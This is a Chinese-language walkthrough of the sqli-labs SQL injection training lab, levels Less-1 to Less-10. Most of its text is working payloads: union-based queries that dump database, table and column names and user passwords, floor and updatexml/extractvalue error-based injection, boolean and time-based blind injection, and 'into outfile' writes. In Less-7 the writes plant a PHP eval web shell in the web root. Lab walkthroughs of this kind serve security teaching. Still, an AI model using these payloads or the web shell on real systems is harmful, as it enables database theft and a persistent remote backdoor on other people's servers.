目录
注入一般步骤:
1.求闭合字符
2.选择注入模式
3.爆数据库
4.爆表名
5.爆列名
6.爆字段
SQL注入基本语句
order by 3 判断有几列
union select 1,2,3
union select 1,version(),database()
union select 1,user(),group_concat(schema_name) from information_schema.schemata
Less-1
?id=1'
?id=1' order by 3 %23
?id=1' order by 4 %23报错,所以有三列
UNION注入
id=0是为了查询一个不存在的id
?id=0' union select 1,2,3 %23
?id=0' union select 1,user(),database() %23
?id=0' union select 1,user(),schema_name from information_schema.schemata %23
group_concat是将一个表中同属性的连接到一起,即将列名一致的全部连接到一起。
concat ()方法用于连接两个或多个数组。
查有哪些数据库
?id=0' union select 1,user(),group_concat(schema_name) from information_schema.schemata %23
查数据库中有哪些表
security数据库中的表
?id=0' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' %23
查某表的所有列
users表的列
?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' %23
查看表里的内容
?id=0' union select 1,group_concat(id),group_concat(password) from security.users %23
?id=d=0' union select 1,group_concat(username),group_concat(password) from security.users %23
?id=0' union select 1,2,@@datadir %23 查看路径
Less-2
?id=1 and 1=1 %23
?id=1 and 1=2 %23
?id=1 order by 3 %23
?id=1 order by 4 %23
之后步骤一致
Less-3
?id=1'
有回显
?id=1') and 1=1 %23
?id=1') and 1=2 %23
?id=0') order by 4%23
Less-4
报错
?id=0") union select 1,user(),group_concat(table_name) from information_schema.tables where table_schema="security" %23
?id=0") union select 1,user(),group_concat(column_name) from information_schema.columns where table_name="users" %23
Less-5
ASCII码
?id=1' order by 3 %23
?id=1' and ascii(substr(database(),1,1))=115 %23
floor注入
select 1 from (select count(*) ,concat(version(),floor(rand(0)*2)) x from information_schema.tables group by x) a
select选择的为一个表,第一个表是不用加别名的
第二个表是需要加别名,否则会报错
a为(select count(*) ,concat(version(),floor(rand(0)*2)) x from information_schema.tables group by x)的别名
x为concat(version(),floor(rand(0)*2))的别名
floor(rand(0)*2)
floor为取整
count(*)为返回,必须写否则会报错
:的十六进制编码为0x3a
~的十六进制编码为0x7e
?id=1' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
?id=1' union select 1,2,3 from (select count(*),concat((select concat(version(),0x7e,database(),0x7e,user(),0x7e) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
?id=1' union select 1 from (select count(*),concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a --+
?id=1' union select null,count(*),concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e,floor(rand()*2))as a from information_schema.tables group by a%23
Xpath报错注入
updatexml()函数
updatexml (XML_document, XPath_string, new_value);
- 第一个参数:XML_document是String格式
- 第二个参数:XPath_string (Xpath格式的字符串) ,代表路径
- 第三个参数:new_value,String格式,替换查找到的符合条件的数据
tips:XPATH_string是报错的关键。concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,爆出
0x7e为~,不属于xpath的语法格式;只要不是@ / . 这三个字符以及他们的16进制编码就行。
?id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) %23
?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) %23
?id=1' and updatexml(1,concat(0x7e,(select group_concat(id) from security.users),0x7e),1) %23
?id=1' and updatexml(1,concat(0x7e,(select group_concat(password) from security.users),0x7e),1) %23
发现报不全
?id=1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1) %23
同理,可以更改limit后面的值,依次查看数据库名
?id=1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1),0x7e),1) %23
依次查看表名
?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables limit 0,1),0x7e),1) --+
extractvalue()函数
extractvalue(XML_document,xpath_string)
- 第一个参数:string格式,为XML文档对象的名称 ,可以随便写。
- 第二个参数:xpath_string(xpath格式的字符串)
与updatexml()类似
?id=1' and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e)) %23
Less-6
只需将'改为",其他的命令与Less-5的一致
Less-7
?id=1' 报错
?id=1"
?id=1')) and 1=1 %23
?id=1')) and 1=2 %23 报错
导出数据
?id=1')) union select 1,2,version() into outfile 'C:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\1.txt' %23
?id=1')) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' into outfile 'C:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\2.txt' %23
?id=1')) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' into outfile 'C:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\3.txt' %23
上传一句话木马
?id=1')) union select user(),2,'<?php eval($_POST["cmd"]);?>' into outfile 'C:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\1.php' %23
Less-8
基于布尔型的盲注
截取函数、mid函数、ASCII码函数
left( str, length) 从左开始截取字符串
right(str, length) 从右开始截取字符串
mid(str, start, length)
str,必需;start,必需;length,可选
首先,选择闭合字符
?id=1' %23
选择注入方式为布尔型的盲注
猜数据库的长度
?id=1' and (length(database())) >10 %23 False
?id=1' and (length(database())) = 8 %23 True
猜数据库名
?id=1' and (ascii(substr((select database()) ,1,1))) >96 %23 True
?id=1' and (ascii(substr((select database()) ,1,1))) = 115 %23 True
?id=1' and (ascii(substr((select database()) ,2,1))) = 101 %23 True
...猜出数据库名security...
猜表的长度
?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 5 %23 False
?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 %23 True
?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 %23 True
...尝试找为users的表...
猜表名
判断是否正确
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 %23
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,2,1))) = 115 %23
..依次...确定该表为users
也可以用left()
?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)="users" %23
猜列名
?id=1' and left((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),8)="username" %23 True
猜字段
?id=1' and (ascii(substr((select username from users limit 0,1),1,1))) = 68 %23 True
...需要一点一点试...可太累了......
尝试用另一种方法猜用户名
?id=1' and left((select username from users limit 0,1),4)="Dumb" %23 True
?id=1' and left((select username from users limit 7,1),5)="admin" %23 True
?id=1' and left((select username from users limit 8,1),5)="admin" %23 True
..注意使用left()有一个小小的弊端...以此为例前5位一致时,数据库中结果是一样的,即admin,admin1,admin# 都是成功的....故谨慎使用哦!!!
Less-9
基于时间的盲注
if(expr1, expr2, expr3)
如果 expr1 是 True,则返回 expr2,否则返回 expr3
确定闭合符号
?id=1'+ %23
通过延迟来注入
?id=1'+and+if(1=1, sleep(5), null)+ %23
?id=1'+and (length(database()))=8+and+if(1=1, sleep(5), null)+ %23
?id=1'+and (ascii(substr((select database()) ,1,1)))=115+and+if(1=1, sleep(3), null)+ %23
...依次...根据响应时间判断...
Less-10
把'换成",其余步骤一致。
快自己试试吧~~